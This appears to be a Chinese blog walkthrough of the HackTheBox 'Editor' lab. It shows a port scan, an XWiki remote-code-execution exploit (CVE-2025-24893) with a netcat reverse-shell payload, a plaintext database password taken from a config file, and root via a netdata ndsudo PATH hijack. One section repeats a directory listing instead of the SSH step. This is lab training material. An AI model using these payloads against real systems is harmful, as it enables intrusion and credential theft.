【hackthebox】Editor

Author: 月岛
IconCreated: 2026-03-06
IconUpdated: 2026-03-21
IconHits:
IconHTB
Icon

一、端口扫描与主机信息

使用 naabu 工具进行端口扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
./naabu -host 10.10.11.80 -p 21,22,23,1433,1521,3306,3389,5432,5900,50070,50030,50000,27017,27018,11211,9200,9300,7001,7002,6379,5984,873,443,8000-9090,80-89,80,10000,8888,8649,8083,8080,8089,9090,7778,7001,7002,608                                                                                                   

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

                projectdiscovery.io

[INF] Current naabu version 2.3.5 (outdated)
[WRN] UI Dashboard is disabled, Use -dashboard option to enable
[INF] Running CONNECT scan with non root privileges
10.10.11.80:22
10.10.11.80:8080
10.10.11.80:80
[INF] Found 3 ports on host 10.10.11.80 (10.10.11.80)

扫描结果:

  • 开放端口:22、8080、80

二、域名解析记录

缺少域名解析记录,需补充相关信息。

三、漏洞信息与利用

下标标注的版本存在历史漏洞:

https://github.com/gunzf0x/CVE-2025-24893

漏洞利用过程:

1
2
3
4
5
6
7
   ~/桌/CVE-2025-24893-main ▓▒░ python3 CVE-2025-24893.py -t 'http://10.10.11.80:8080' -c 'busybox nc 10.10.16.65 9001 -e /bin/bash' 
[*] Attacking http://10.10.11.80:8080
[*] Injecting the payload:
http://10.10.11.80:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.16.65%209001%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed

~Happy Hacking

反弹 Shell:

1
2
3
4
5
└─# nc -lvvp 9001 
listening on [any] 9001 ...
connect to [10.10.16.65] from editor.htb [10.10.11.80] 32812
python3 -c 'import pty;pty.spawn("/bin/bash")'
xwiki@editor:/usr/lib/xwiki-jetty$

四、敏感信息收集

目录结构 & 配置文件查看:

1
xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls cache                           jetty-web.xml  version.properties classes                         lib            web.xml fonts                           observation    xwiki.cfg hibernate.cfg.xml               portlet.xml    xwiki-locales.txt jboss-deployment-structure.xml  sun-web.xml    xwiki.properties

Hibernate 配置文件可能包含:

  • 数据库地址
  • 数据库用户名密码(旧版本可能明文)

示例内容:

1
<property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&connectionTimeZone=LOCAL&allowPublicKeyRetrieval=true</property> <property name="hibernate.connection.username">xwiki</property> <property name="hibernate.connection.password">theEd1t0rTeam99</property> <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property> ...

五、横向移动与权限提升

使用数据库密码尝试 SSH 登录:

1
2
3
4
5
6
xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls
cache                           jetty-web.xml  version.properties
classes                         lib            web.xml
fonts                           observation    xwiki.cfg
hibernate.cfg.xml               portlet.xml    xwiki-locales.txt
jboss-deployment-structure.xml  sun-web.xml    xwiki.properties

六、SUID 文件检查与提权思路

常见 SUID 文件列表及说明:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-x--- 1 root netdata 943K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.4M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)
ICMP is not accessible
-rwsr-x--- 1 root netdata 1.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 196K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 80K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 876K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 4.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!)
-rwsr-xr-x 1 root root 40K Feb  6  2024 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 71K Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 35K Apr  9  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Mar 23  2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 227K Jun 25 12:48 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 59K Feb  6  2024 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 47K Apr  9  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 72K Feb  6  2024 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-- 1 root messagebus 35K Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 331K Apr 11  2025 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Feb 26  2022 /usr/libexec/polkit-agent-helper-1

重点关注:

  • /opt/netdata 目录下存在多个未知 SUID 二进制文件
  • 检查 sudo、passwd 等常见提权点

七、最终提权操作

**利用 SUID 文件提权:**https://github.com/AzureADTrent/CVE-2024-32019-POC

1
2
3
4
5
oliver@editor:/tmp$ chmod +x nvme
oliver@editor:/tmp$ export PATH=/tmp:$PATH
oliver@editor:/tmp$ 
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp#

总结:

  • 完成端口与主机信息收集
  • 成功利用漏洞获取初始 shell
  • 通过配置文件发现敏感信息并横向登录
  • 检查 SUID 文件并实现提权
Previous postHello World